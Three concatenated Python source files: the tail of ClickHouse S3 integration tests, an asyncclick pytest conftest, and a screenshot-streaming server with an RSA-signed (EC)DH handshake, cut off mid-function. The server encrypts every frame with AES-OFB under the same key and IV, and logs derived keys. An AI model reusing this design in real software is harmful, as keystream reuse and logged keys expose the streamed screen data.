"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
def test_wrong_s3_syntax(started_cluster):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('', '', '', '', '', '')"
assert expected_err_msg in instance.query_and_get_error(query)
expected_err_msg = "Code: 36" # BAD_ARGUMENTS
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3('')"
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query("DROP TABLE IF EXISTS test")
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
instance.query("DROP TABLE test")
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
run_query(instance, f"DROP TABLE IF EXISTS {name}")
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["565"]
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
def test_truncate_table(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "truncate"
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
instance.query("TRUNCATE TABLE {}".format(name))
minio = started_cluster.minio_client
timeout = 30
while timeout > 0:
if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0)
assert instance.query("SELECT * FROM {}".format(name)) == ""
def test_predefined_connection_configuration(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "test_table"
instance.query("drop table if exists {}".format(name))
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3(s3_conf1, format='CSV')".format(name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
result = instance.query("SELECT * FROM s3(s3_conf1, format='CSV', structure='id UInt32')")
assert result == instance.query("SELECT number FROM numbers(10)")
result = ""
def test_url_reconnect_in_the_middle(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "id String, data String"
filename = "test_url_reconnect_{}.tsv".format(random.randint(0, 1000))
instance.query(f"""insert into table function
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
select number, randomPrintableASCII(number % 1000) from numbers(1000000)""")
with PartitionManager() as pm:
pm_rule_reject = {'probability': 0.02, 'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'REJECT --reject-with tcp-reset'}
pm_rule_drop_all = {'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'DROP'}
pm._add_rule(pm_rule_reject)
def select():
global result
result = instance.query(
f"""select sum(cityHash64(x)) from (select toUInt64(id) + sleep(0.1) as x from
url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
settings http_max_tries = 10, http_retry_max_backoff_ms=2000, http_send_timeout=1, http_receive_timeout=1)""")
assert(int(result) == 3914219105369203805)
thread = threading.Thread(target=select)
thread.start()
time.sleep(4)
pm._add_rule(pm_rule_drop_all)
time.sleep(2)
pm._delete_rule(pm_rule_drop_all)
pm._delete_rule(pm_rule_reject)
thread.join()
assert(int(result) == 3914219105369203805)
def test_seekable_formats(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM s3') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_seekable_formats_url(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_parquet', 'Parquet', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_orc', 'ORC', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM url') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_insert_with_path_with_globs(started_cluster):
instance = started_cluster.instances["dummy"]
table_function_3 = f"s3('http://minio1:9001/root/test_parquet*', 'minio', 'minio123', 'Parquet', 'a Int32, b String')"
instance.query_and_get_error(f"insert into table function {table_function_3} SELECT number, randomString(100) FROM numbers(500)")
def test_s3_schema_inference(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3(s3_native, structure='a Int32, b String', format='Native') select number, randomString(100) from numbers(5000000)")
result = instance.query(f"desc s3(s3_native, format='Native')")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from s3(s3_native, format='Native')")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference engine=S3(s3_native, format='Native')")
result = instance.query(f"desc schema_inference")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference")
assert(int(result) == 5000000)
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference_2 engine=URL('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')")
result = instance.query(f"desc schema_inference_2")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference_2")
assert(int(result) == 5000000)
def test_overwrite(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_overwrite as {table_function}")
instance.query(f"truncate table test_overwrite")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(50) settings s3_truncate_on_insert=1")
instance.query_and_get_error(f"insert into test_overwrite select number, randomString(100) from numbers(100)")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(200) settings s3_truncate_on_insert=1")
result = instance.query(f"select count() from test_overwrite")
assert(int(result) == 200)
def test_create_new_files_on_insert(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
instance.query(f"drop table test_multiple_inserts")
table_function = f"s3(s3_parquet_gz, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
def test_format_detection(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table arrow_table_s3 (x UInt64) engine=S3(s3_arrow)")
instance.query(f"insert into arrow_table_s3 select 1")
result = instance.query(f"select * from s3(s3_arrow)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
|
conftest.py
|
import os
import tempfile
import pytest
import anyio
from functools import partial
from threading import Thread
from asyncclick.testing import CliRunner
class SyncCliRunner(CliRunner):
def invoke(self,*a,_sync=False,**k):
fn = super().invoke
if _sync:
return fn(*a,**k)
# anyio now protects against nested calls, so we use a thread
result = None
def f():
nonlocal result,fn
async def r():
return await fn(*a,**k)
result = anyio.run(r) ## , backend="trio")
t=Thread(target=f, name="TEST")
t.start()
t.join()
return result
@pytest.fixture(scope="function")
def runner(request):
return SyncCliRunner()
def _check_symlinks_supported():
with tempfile.TemporaryDirectory(prefix="click-pytest-") as tempdir:
target = os.path.join(tempdir, "target")
open(target, "w").close()
link = os.path.join(tempdir, "link")
try:
os.symlink(target, link)
return True
except OSError:
return False
symlinks_supported = _check_symlinks_supported()
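# A minimal usage sketch for the fixture above (the `cli` command is hypothetical and not
# defined in this conftest): it shows how a plain synchronous pytest test can drive an
# asyncclick command through SyncCliRunner.
#
#   def test_greet(runner):
#       result = runner.invoke(cli, ["--name", "world"])
#       assert result.exit_code == 0
#       assert "world" in result.output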
|
streaming_secured_server.py
|
# Need threading for multiple clients and a way to terminate gracefully
import threading
# Process command line arguments
import argparse
# Stamp the frames with a timestamp
import datetime
# May need for sleep
import time
# Necessary to process images with openCV
import numpy as np
import pyautogui
import imutils
import cv2
from PIL import UnidentifiedImageError, ImageFile
import os
# Needed for network communication
import pickle
import struct
# Needed to handle async calls
import asyncio
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
# Needed for logging
import logging
# Needed for exit handling
from contextlib import suppress
# Setting to handle partial frames
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Globals for handling the frames
outputFrame = None
lock = threading.Lock()
# Global to handle streaming loops
stream = True
# Vars for Select
read_list = []
write_list = []
message_queues = {}
dh_keyexchanges = {}
client_derived_keys_ivs = {}
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
g = 2
serialized_RSA_server_public_key = None
RSA_server_private_key = None
disable_ecdh = False
loop = None
restricted = False
trusted_keys_whitelist = {}
# thread that listens for any input, used to terminate stream loop
# def key_capture_thread(server_socket):
# global stream
# input()
# stream = False
# print("starting exit process")
def capture_frames():
global outputFrame, lock, stream, message_queues
main_logger = logging.getLogger("main")
try:
# while not event.is_set():
while stream:
##
# im = Image.open('.screenshot2021-0501_20-10-04-094593.png')
# im.load()
##
# Grab a screenshot
frame = pyautogui.screenshot()
# Convert it to an np array and cv2 (BGR) color format
frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)
# Resize so we send consistent amount of data
frame = imutils.resize(frame, width=800)
# Stamp Frame with current time.
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
with lock:
outputFrame = frame.copy()
time.sleep(0.1)
# print("captured a screenshot")
# print(stream)
except UnidentifiedImageError as e:
quoted_filename = e.args[0].split()[4]
filename = quoted_filename.strip("'")
if os.path.exists(filename):
os.remove(filename)
main_logger.info("Deleted leftover temp image file")
except OSError as e:
if e.errno == 2:
main_logger.debug("During shutdown temp file was not written to disk, capture thread aborted")
pass
else:
raise e
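# Symmetric helpers: frames are encrypted with AES in OFB mode, using the key and IV
# derived from the (EC)DH shared secret via HKDF further below.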
def encrypt(key, plaintext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
encryptor = cipher.encryptor()
# Encrypt
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
return ciphertext
def decrypt(key, ciphertext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
decryptor = cipher.decryptor()
# Decrypt
deciphered_text = decryptor.update(ciphertext) + decryptor.finalize()
return deciphered_text
def generate_dh_key_pairs():
# Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
global p, g
# Use our p and g with cryptography library
params_numbers = dh.DHParameterNumbers(p, g)
parameters = params_numbers.parameters(default_backend())
# Generate private and public key
host_private_key = parameters.generate_private_key()
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
host_private_key = ec.generate_private_key(
ec.SECP384R1()
)
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def encrypt_and_send_AES_OFB_message(client_socket, plaintext, key, iv):
ciphertext = encrypt(key, plaintext, iv)
client_socket.send(len(ciphertext).to_bytes(2, "big") + ciphertext)
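# PKI helper operations (currently unused in the main flow, see the commented-out
# registration block near the bottom): opcode b'0' registers a signed public key with
# the PKI server, opcode b'1' looks one up; payloads use a 2-byte big-endian length prefix.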
def lookupIP(client_socket, public_key):
client_socket.send(b'1')
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
output = client_socket.recv(1024)
return output
def registerPublicKey(client_socket, public_key, private_key):
client_socket.send(b'0')
signed_public_key = sign(private_key, public_key)
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
client_socket.send(len(signed_public_key).to_bytes(2, "big") + signed_public_key)
output = client_socket.recv(1024)
return output
def sign(private_key, data):
signature = private_key.sign(
data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return signature
def verify(public_key, signature, message):
# Verify signature
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
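# new_client drives the per-connection handshake and streaming loop:
# 1. HELO: exchange PEM-encoded RSA public keys (clients can be rejected via the whitelist).
# 2. DHINI: server sends its DER-encoded (EC)DH public key.
# 3. PUBK: client sends its (EC)DH public key plus an RSA-PSS signature over both RSA keys
# and both (EC)DH keys; the server verifies it and replies with its own signature + DHFIN.
# 4. HKDF over the shared secret derives the AES key, IV, HMAC key and session id,
# after which encrypted frames are streamed in response to READY messages.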
async def new_client(reader, writer):
global lock, stream, outputFrame, serialized_RSA_server_public_key, RSA_server_private_key
global disable_ecdh, loop, restricted, trusted_keys_whitelist
main_logger = logging.getLogger("main")
client_logger = logging.getLogger("client")
addr = writer.get_extra_info('peername')
main_logger.info(f"Client connected: {addr}")
client_logger_extras = {'clientip': f"{addr[0]}", 'clientport': f"{addr[1]}"}
client_logger = logging.LoggerAdapter(client_logger, client_logger_extras)
try:
# --------- DH Key EXCHANGE START -----------##
if disable_ecdh:
host_private_key, host_public_key_enc = generate_dh_key_pairs()
else:
host_private_key, host_public_key_enc = generate_ecdh_key_pairs()
data = await reader.read(4)
size = None
serialized_RSA_client_public_key = None
abort = False
if data == b"HELO":
size = await reader.read(2)
serialized_RSA_client_public_key = await reader.read(int.from_bytes(size, "big"))
initial_message = (b"HELO" +
len(serialized_RSA_server_public_key).to_bytes(2, "big") +
serialized_RSA_server_public_key)
client_logger.debug(f"Public Key Received: {serialized_RSA_client_public_key}")
if restricted:
if serialized_RSA_client_public_key not in trusted_keys_whitelist:
client_logger.info("Rejecting client, not in whitelist")
initial_message = b"RJKT"
writer.write(initial_message)
await writer.drain()
abort = True
return
writer.write(initial_message)
await writer.drain()
else:
abort = True
return
data = await reader.read(5)
if data == b"DHINI" and not abort:
writer.write(len(host_public_key_enc).to_bytes(2, "big") + host_public_key_enc)
await writer.drain()
else:
abort = True
return
data = await reader.read(4)
if data == b"PUBK" and not abort:
# The ECDH Key
size = await reader.read(2)
remote_public_key_enc = await reader.read(int.from_bytes(size, "big"))
client_logger.debug(f"KeyExchange: Size of remote's public key: {int.from_bytes(size, 'big')}")
client_logger.debug(f"Remote's public key: {remote_public_key_enc}")
# The message signature
size = await reader.read(2)
remote_signature = await reader.read(int.from_bytes(size, "big"))
intended_message = (serialized_RSA_server_public_key +
serialized_RSA_client_public_key +
host_public_key_enc +
remote_public_key_enc)
verify(load_pem_public_key(serialized_RSA_client_public_key), remote_signature, intended_message)
client_logger.info("Message Verified")
# The host_signature to prove the intended public key was received
host_message = serialized_RSA_server_public_key + remote_public_key_enc
with lock:
host_signature = sign(RSA_server_private_key, host_message)
writer.write(len(host_signature).to_bytes(2, "big") + host_signature + b"DHFIN")
await writer.drain()
remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
if disable_ecdh:
shared_key = host_private_key.exchange(remote_public_key)
else:
shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
# client_derived_keys_ivs[s] = (derived_key, derived_iv)
# --------- DH Key EXCHANGE END -----------##
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Key: {derived_key}")
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id = 1
else:
abort = True
return
while stream and not abort:
data = await reader.read(1024)
if data == b'READY':
# print("got a READY")
with lock:
# print("got LOCK")
serializedFrame = pickle.dumps(outputFrame)
encr_serializedFrame = encrypt(derived_key, serializedFrame, derived_iv)
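# Wire format of each frame message:
# HMAC-SHA256 (32 bytes) || session id (32) || component id (4, big-endian)
# || ciphertext length (8, struct "Q") || AES-OFB ciphertext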
message = derived_session_id
bytes_component_id = component_id.to_bytes(4, "big")
message += bytes_component_id
# when width was 800
# 1200165 when aspect ratio was 16:10
# 1080165 when aspect ratio was 16:9
# print("len encr_serializedFrame")
# print(len(encr_serializedFrame))
message += struct.pack("Q", len(encr_serializedFrame))+encr_serializedFrame
# Make an hmac for message
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(message)
message_hmac = h.finalize()
message = message_hmac + message
# print("sending FRAME")
writer.write(message)
await writer.drain()
component_id += 1
elif data == b'LEAVING':
break
if outputFrame is not None:
pass
# # Show the image, debugging
# cv2.imshow('SERVER STREAMING VIDEO',outputFrame)
# # Way to close the feed, required for imshow to work properly
